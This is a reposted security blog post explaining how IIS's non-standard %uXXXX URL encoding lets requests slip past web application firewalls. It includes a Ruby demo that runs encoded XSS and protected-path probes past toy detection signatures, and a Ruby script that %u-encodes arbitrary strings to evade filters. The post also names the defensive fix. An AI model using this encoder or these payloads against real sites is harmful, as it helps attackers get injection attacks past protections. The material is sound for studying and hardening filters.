
WAF bypass: WAF bypass tips - %u encoding

Published 5 years ago | Author: seay | Category: Penetration testing | Posted: 12 December 2012 | Views: 2,848


The URL encodings you normally meet are UTF-8 percent-encoding (%xx%xx) and single-byte hex encoding (%xx). Most IDS and WAF products recognise and decode both before running their regex rules. IIS, however, accepts a third, non-standard encoding on top of these: the %u encoding this post is about (%uxxxx, where the four hex digits are a 16-bit Unicode code point). See the original article for the details. Some techniques simply do not age; the only question is whether you still care. Concretely, a request for abc.as%u0070 is a request for abc.asp. On IIS, then, this is a bypass whenever the WAF in front of the server cannot tell the two apart. The fix on the defensive side is to normalise %uxxxx before matching (ModSecurity, for instance, ships a urlDecodeUni transformation for exactly this Microsoft-specific form); a WAF that only understands %xx never sees the decoded string.
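The following is an added example, not code from the original post: it shows the decoding side of the trick, i.e. what a %u-unaware filter sees compared with what an IIS-style decoder produces, and runs a small set of signatures over both. The request paths and the three detection patterns are constructed for the demo, and the decoder is a single-pass model of the behaviour described above, not IIS's actual implementation.

```ruby
# Added example (not from the original post): the decoding side of %u encoding.
# A WAF that only understands standard percent-encoding (%XX) never sees the
# ".asp" or "<script>" hidden behind %uXXXX, while an IIS-style decoder does.
# All request paths and detection patterns below are constructed for the demo.

# Standard decoder: %XX -> byte. This is what a %u-unaware filter sees.
# Work on a binary copy so replacement bytes never clash with the input's
# encoding, then reinterpret as UTF-8 (scrub replaces any invalid sequences).
def standard_decode(path)
  path.b.gsub(/%(\h{2})/i) { $1.to_i(16).chr }
      .force_encoding(Encoding::UTF_8).scrub
end

# IIS-style decoder: additionally turns the non-standard %uXXXX form into the
# Unicode code point U+XXXX. Single pass only; no double-decoding is modelled.
def iis_style_decode(path)
  path.b.gsub(/%u(\h{4})|%(\h{2})/i) do
    $1 ? [$1.to_i(16)].pack('U').b : $2.to_i(16).chr
  end.force_encoding(Encoding::UTF_8).scrub
end

# Toy WAF signatures (constructed; real rulesets are far larger).
BLOCKED_PATTERNS = [
  %r{/admin\.asp}i,      # a protected resource
  /<script/i,            # reflected XSS probe
  /union\s+select/i,     # SQL injection probe
].freeze

# Run the signatures over the *decoded* request, as a WAF would.
# `decoder` is the name of one of the two decode functions above.
# Returns :block or :allow.
def waf_verdict(raw_path, decoder)
  decoded = send(decoder, raw_path)
  BLOCKED_PATTERNS.any? { |re| decoded.match?(re) } ? :block : :allow
end

# Compare both decoders on the same raw request; an :allow from the
# standard decoder next to a :block from the IIS decoder is the bypass.
def compare(raw_path)
  {
    raw: raw_path,
    waf_sees: standard_decode(raw_path),
    iis_sees: iis_style_decode(raw_path),
    naive_waf: waf_verdict(raw_path, :standard_decode),
    u_aware_waf: waf_verdict(raw_path, :iis_style_decode),
  }
end

if $PROGRAM_NAME == __FILE__
  [
    '/admin.as%u0070',                   # the post's abc.as%u0070 case
    '/search.asp?q=%u003cscript%u003e',  # %u-encoded <script>
    '/search.asp?q=%3cscript%3e',        # plain %XX, caught by both decoders
  ].each { |p| puts compare(p).inspect }
end
```

The first two requests come back as :allow from the naive decoder and :block from the %u-aware one; the third is blocked by both, because it uses only the standard %XX form. Note that `iis_style_decode('%u005f')` yields `_`, which is the code point the lookup table in the script below should use for underscore.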

Below is a modified Ruby script that converts the characters of a string into the %u encoding described above.

# Convert every character of a string to the IIS %uXXXX form.
# Characters in the table get %uXXXX; anything else is percent-encoded
# byte by byte. The table is generated from the character list instead of
# being written out by hand: the hand-written original mapped '_' to %u0095,
# which is not the code point of underscore (U+005F), so it would not have
# decoded back to '_' on the server.

SPECIALS = " /\\'\"><#!$*@._(),%-;:|&+=".chars
ALNUM = ('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a

LOOKUP_TABLE = (SPECIALS + ALNUM).each_with_object({}) do |c, table|
  table[c] = format('%%u%04x', c.ord)
end.freeze

def unicode_url(string)
  string.each_char.map do |c|
    if LOOKUP_TABLE.key?(c)
      LOOKUP_TABLE[c]
    else
      # URI.escape was removed in Ruby 3.0; percent-encode the raw bytes instead
      c.bytes.map { |b| format('%%%02x', b) }.join
    end
  end.join
end

print 'Enter string to URL Unicode: '
puts unicode_url(gets.to_s.chomp)

PS: encoding seems very powerful in many places, but I have not grasped its essence yet and am still at a fuzzy stage.

Author: qingsh4n

Tags: WAF bypass



From the Seay Internet Security Blog
Original URL: http://www.cnseay.com/1852/
For the copyright terms see the pinned post; respect the author and credit the original URL with a link when reposting.
